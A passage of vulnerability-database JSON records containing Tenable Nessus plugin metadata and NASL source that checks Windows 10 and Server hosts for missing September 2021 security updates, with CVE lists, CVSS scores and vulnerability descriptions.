hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005573])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:40", "description": "The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005568.NASL", "href": "https://www.tenable.com/plugins/nessus/153373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153373);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005568\");\n script_xref(name:\"MSFT\", value:\"MS21-5005568\");\n\n script_name(english:\"KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005568-os-build-17763-2183-d19b2778-204a-4c09-a0c3-23dc28d5deac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54269929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005568.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005568');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005568])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:07", "description": "The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005566.NASL", "href": "https://www.tenable.com/plugins/nessus/153383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005566\");\n script_xref(name:\"MSFT\", value:\"MS21-5005566\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005566-os-build-18363-1801-c2535eb5-9e8a-4127-a923-0c6a643bba1d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff9fca7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005566.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005566'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005566])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:54:48", "description": "The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005565.NASL", "href": "https://www.tenable.com/plugins/nessus/153381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153381);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005565\");\n script_xref(name:\"MSFT\", value:\"MS21-5005565\");\n\n script_name(english:\"KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # 